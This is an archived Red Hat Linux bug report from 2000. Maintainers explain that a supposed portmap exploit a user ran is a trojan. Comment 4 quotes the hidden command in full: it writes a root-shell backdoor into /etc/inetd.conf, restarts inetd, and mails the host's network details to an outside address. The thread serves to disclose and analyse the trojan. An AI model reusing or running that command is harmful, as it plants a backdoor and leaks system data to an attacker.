Bug 21183 - portmapper buffer overflow
Summary: portmapper buffer overflow
Status: CLOSED NOTABUG
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: portmap   
(Show other bugs)
Version: 6.2
Hardware: i386
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Trond Eivind Glomsrxd
QA Contact: Aaron Brown
URL:
Whiteboard:
Keywords: Security
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2000-11-21 15:56 UTC by Need Real Name
Modified: 2007-04-18 16:29 UTC (History)
1 user (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2000-11-22 09:15:03 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

Description Need Real Name 2000-11-21 15:56:22 UTC
Our system was hit by this exploit.  I don't see any bug report related to it.

http://packetstorm.securify.com/9908-exploits/portmap.txt

Comment 1 Pekka Savola 2000-11-21 17:44:08 UTC
This is no portmap exploit.  There's a trojan hidden in the shellcode which tries to 
add a backdoor in /etc/inetd.conf.


Comment 2 Bill Nottingham 2000-11-22 05:06:29 UTC
So, someone ran a trojan on your system?  I'm not sure I understand
what you're trying to report.

Comment 3 Pekka Savola 2000-11-22 05:57:09 UTC
I think he found the exploit from somewhere, decided to try it on a system or
two but got trojaned himself..


Comment 4 Jarno Huuskonen 2000-11-22 09:15:01 UTC
The "exploit" script calls system with:
/bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ;
/bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail
goat187@hotmail.com 2>&1 2>/dev/null

this system call is disguised as a pmap_proc_p call (and pmap_proc_p is defined
as system).


Comment 5 Need Real Name 2000-11-22 14:53:29 UTC
Apparently I did not read the comments close enough and did not see that it was a trojan.  I've since found that we were rooted by a ftpd buffer overflow.  
The rootkit the attacker used added the root shell to inetd.conf and mailed the IP address and /etc/shadow of the machine.


Note You need to log in before you can comment on or make changes to this bug.